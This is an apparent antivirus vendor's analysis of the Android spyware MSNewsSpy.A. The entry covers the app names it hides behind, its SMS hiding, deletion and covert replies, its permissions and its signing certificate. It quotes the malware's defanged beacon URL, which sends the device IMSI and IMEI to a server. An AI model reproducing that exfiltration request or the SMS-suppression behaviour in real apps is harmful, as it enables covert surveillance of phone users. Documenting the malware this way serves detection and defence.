Android/MSNewsSpy.A!tr.spy

Analysis

Android/MSNewsSpy.A!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as a mobile payment or reading application however, in the background, spies on incoming SMS messages. It selectively hides incoming SMS from certain phone numbers. Additionally, SMS messages starting with certain codes are hidden and an SMS is sent back to a fixed number in the background. Finally, it sends the phone's IMSI and IMEI to a server.

Technical details
The main application can be called "塔读" or "Mobile Payment" or "流声机" and comes in packages named "com.tadu.android", "com.polyvi.cupmpbasic" or "com.tom.music.fm".
Some of the application icons can be seen below



Fig : Application icons
Apart from the application's legitimate functions, the package contains a receiver MSNewsReciever (misspelt) that is launched whenever the phone is rebooted, an SMS is received or a phone call is made/received. It also contains a service MSNewsService. These two components perform the following malicious functions:
When the application is launched, an HTTP request is sent to

"hxxp://[REMOVED].cn/mg/vrs?uid=" + g.c + "&imsi=" + [Device_IMSI] + "&imei=" + [Device_IMEI] +
 "&ver=a1024" + "&bi=1158" + ">=" + [UA] + "&gs=" + [GLOBAL]

where UA and GLOBAL are obtained from a package configuration file.
Next, the malware spies on incoming SMS messages. All incoming SMS from

• 10658007
• 10659190
• 10655555

are hidden
Additionally, SMS messages received that contain text starting with "!#10:", "!#16:", "!#20:" or "!#30:" are hidden.
If the received SMS body starts with "!#10:", all existing SMS messages from the sender's phone number are permanently deleted from the phone. Then in the background, an SMS is sent to

13823308135

with the contents

!#10:va1054#d2054#t0#m310260000000000#s-1#r-1#i0#

Permissions required by the application:

• INTERNET
• READ_PHONE_STATE
• ACCESS_COARSE_LOCATION
• ACCESS_NETWORK_STATE
• WRITE_EXTERNAL_STORAGE
• MOUNT_UNMOUNT_FILESYSTEMS
• GET_TASKS
• RESTART_PACKAGES
• INSTALL_SHORTCUT
• CALL_PHONE
• WRITE_APN_SETTINGS
• RECEIVE_BOOT_COMPLETED
• ACCESS_WIFI_STATE
• CHANGE_WIFI_STATE
• CHANGE_NETWORK_STATE
• MODIFY_PHONE_STATE
• WAKE_LOCK
• SEND_SMS
• RECEIVE_SMS
• READ_SMS
• WRITE_SMS
• DEVICE_POWER
• WRITE_SETTINGS
• READ_CONTACTS
• WRITE_CONTACTS

Aimed at Chinese users
Certificate information:

• Owner: CN=JackSmith, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
• Issuer: CN=JackSmith, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
• Serial number: 4e16565b
• Valid from: Fri Jul 08 02:59:07 CEST 2011 until: Sat Apr 10 02:59:07 CEST 2066
• Certificate fingerprints:
• MD5: 38:E2:24:6C:19:D9:C0:20:F2:96:7B:A2:10:A3:CA:BD
• SHA1: A3:E1:54:D9:24:8C:00:65:7B:B0:15:63:2B:76:89:FF:18:86:33:3D
• Signature algorithm name: SHA1withRSA
• Version: 3

Recommended Action

FortiGate Systems

• Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
  FortiClient Systems
  
• Quarantine/delete files that are detected and replace infected files with clean backup copies.